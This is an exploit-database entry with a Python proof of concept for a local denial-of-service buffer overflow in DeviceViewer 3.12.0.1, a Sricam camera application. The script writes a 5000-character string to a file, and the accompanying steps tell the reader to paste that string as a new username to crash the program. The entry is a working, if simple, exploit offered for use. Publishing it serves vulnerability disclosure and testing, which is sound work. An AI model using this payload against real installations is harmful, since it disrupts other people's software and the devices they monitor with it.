DeviceViewer 3.12.0.1 Denial Of Service

2019.09.25
Credit: x00pwn
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/python # Exploit Title: DeviceViewer 3.12.0.1 - 'creating user' DOS buffer overflow # Date: 9/23/2019 # Exploit Author: x00pwn # Vendor Homepage: http://www.sricam.com/ # Software Link: http://download.sricam.com/Manual/DeviceViewer.exe # Version: v3.12.0.1 # Tested on: Windows 7 # Steps to reproduce: # 1. Generate a malicious payload via the POC # 2. In the Sricam application create a new user # 3. When creating a new user, set the username as the malicious payload # 4. Observe a program DOScrash payload = "A" * 5000 try: evilCreate =open("exploit.txt","w") print(""" DeviceViewer 3.12.0.1 DOS exploit POC Author: Nu11pwn """) print("[x] Creating malicious file") evilCreate.write(payload) evilCreate.close() print("[x] Malicious file create") print("[x] When creating a new user, set the username to the file contents") print("[x] Watch the program crash") except: print("[!] File failed to be created")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top